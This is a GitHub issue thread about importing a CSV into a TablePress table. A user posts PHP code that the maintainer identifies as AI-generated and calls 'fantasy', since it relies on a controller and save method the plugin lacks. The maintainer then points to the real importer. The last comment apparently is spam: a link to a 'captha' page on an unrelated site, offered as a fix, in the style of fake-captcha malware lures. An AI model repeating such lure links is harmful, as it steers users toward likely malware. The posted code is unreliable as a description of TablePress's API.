### ISSUE TITLE
controller-table.php not found

### ISSUE THREAD

**Issue by engeldo** [TablePress/TablePress#206]
Ich möchte mit folgendem Code einen Tabellenimport auf der Webseite ermöglichen, welcher eine bestehende Tabelle ersetzt:
```
function csv_import_form() {
    if ( current_user_can('manage_options') ) { // Nur für berechtigte Benutzer anzeigen
        return '
            <form enctype="multipart/form-data" method="post">
                <input type="file" name="csv_file" accept=".csv" required />
                <input type="submit" name="import_csv" value="Import CSV" />
            </form>
        ';
    } else {
        return 'Sie haben keine Berechtigung, dieses Formular zu sehen.';
    }
}
add_shortcode('csv_import', 'csv_import_form');

function handle_csv_import() {
    if ( isset($_POST['import_csv']) && current_user_can('manage_options') ) {
        $file = $_FILES['csv_file']['tmp_name'];

        if ( $file ) {
            $table_id = 1; // ID der Tabelle, in die importiert wird

            // Lesen der CSV-Datei
            $csv_data = array_map('str_getcsv', file($file));

            // Sicherstellen, dass TablePress geladen ist
            if ( class_exists('TablePress') ) {
                $table_controller = TablePress::load_controller( 'table' );
                $table_controller->save( array(
                    'id' => $table_id,
                    'content' => $csv_data,
                    'import_method' => 'replace' // Bestehende Datei überschreiben
                ) );

                echo 'Import erfolgreich!';
            } else {
                echo 'TablePress konnte nicht geladen werden.';
            }
        } else {
            echo 'Fehler beim Hochladen der Datei.';
        }
    }
}
add_action('wp_head', 'handle_csv_import');
```

Es fehlt hier jedoch im tablepress Verzeichnis die Datei controller-table.php

Hab jemand eine Idee, was ich tun kann? Bin leider gerade etwas überfordert :(

**Comment by TobiasBg** [comment]
Hi @engeldo,

This looks like a code snippet from ChatGPT or similar, right?
Unfortunately, this will not work, as there's just too much "fantasy" in this code. :-/

I suggest that you take a look at how TablePress imports tables in the admin area, see https://github.com/TablePress/TablePress/blob/main/controllers/controller-admin.php#L1152-L1202, and then take inspiration from that. Essentially, you will need to call `$importer->run( $import_config );` with a properly constructed import configuration array.

Best wishes,
Tobias

**Comment by kun18911** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
